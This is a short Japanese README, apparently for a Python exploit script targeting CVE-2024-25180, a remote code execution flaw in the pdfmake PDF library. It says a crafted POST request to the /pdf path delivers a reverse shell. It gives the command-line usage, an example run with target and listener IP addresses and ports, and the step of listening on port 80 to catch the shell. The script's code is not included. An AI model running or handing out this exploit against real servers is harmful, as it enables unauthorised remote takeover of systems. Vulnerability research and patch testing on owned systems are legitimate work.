
CVE-2024-25180(pdfmakeのリモートコード実行脆弱性)用のPythonエクスプロイトスクリプト。細工されたPOSTリクエストを介してリバースシェルを配信します。
pdfmakeは、純粋なJavaScript製のクライアント/サーバーサイドPDF印刷ライブラリです。このパッケージの影響を受けるバージョンは、任意のコードインジェクション攻撃に対して脆弱です。攻撃者は、/pdf パスに細工したPOSTリクエストを送信することで、任意のコードを実行できます。攻撃者は、細工したリクエストを送信することにより、システム上で任意のコードを実行できます。
CVE-2024-25180 pdfmakeにおけるリモートコード実行
python3 CVE-2024-25180.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>
python3 CVE-2024-25180.py 192.168.140.42 1234 192.168.45.208 80
ポート80をリッスンすると、リバースシェルを取得できます。
